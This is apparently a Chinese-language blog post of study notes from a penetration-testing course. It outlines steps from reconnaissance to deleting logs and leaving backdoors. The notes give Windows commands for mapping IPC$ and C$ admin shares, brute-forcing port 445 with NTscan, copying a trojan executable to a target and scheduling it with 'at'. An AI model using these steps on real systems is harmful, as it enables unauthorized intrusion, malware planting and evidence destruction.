笔记
由于太困,文章涉及的软件想要私聊(其实网上都有,想找都能找到)
还有有的软件下载谷歌浏览器权限不足(这个问题我也不知道是不是叫这个)
解决:谷歌里面安装迅雷插件,或者换个浏览器下载或者复制下载连接在迅雷里面下载;
太困了,明天再写吧!1!!!
1.授权
2.信息收集(nslookup whois)
3.扫描漏洞
namp扫描IP 范围 端口 80 {IIS,apache,什么网站,软件 漏洞})scanpot软件扫描;
高级扫描:如IIS漏洞 2003-iis6.0 2008iis7.0
扫描网站漏洞(十大网站漏洞 )
4.漏洞利用
5.提权(shell环境命令控制权,桌面环境,最高权限)
=======删库跑路
6.毁尸灭迹(删除日志)
7.留后门
8.渗透测试报告(漏洞,端口)=》安全加固方案
手工测试端口号开放:
telnet IP地址 测试端口
映射共享文件夹,在本地电脑F盘
net use f: \10.1.1.2\share ROOT /user:administrator
net use f: \10.1.1.2\share /del
md 文件夹(创建文件夹)
w漏洞利用之IPC$:
net use f: \10.1.1.2\share 密码 /user:用户名
net use f: /del
net use * /del
net use f: \10.1.1.2\c$ 密码 /user:用户名
net use f: \10.1.1.2\ipc$ 密码 /user:用户名
暴力破解系统密码之445:
445漏洞利用之一IPC$:
1、scanport 扫描445端口
2、进行暴力破解:NTscan
net use f: \10.1.1.2\ipc$ 密码 /user:用户名
net use f: \10.1.1.2\share 密码 /user:用户
net use * /del
net use * /del
net use f: \10.1.1.2\c$ 密码 /user:用户名
4、制作木马
copy con haha.bat
shutdown -s -t 100
^z
拷贝在f:盘
copy haha.bat f:
5、植入木马(留后门)
copy d:\heihei.exe \10.1.1.2\c$
6、设计计划任务自动执行木马:
net time \10.1,1.2
at \10.1.1.2 11:11 “c:\heihei.exe”
7、等待肉鸡上线
参考文献:
千锋教育(https://www.bilibili.com/video/BV1i7411G7vm)
扫一扫
1136
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
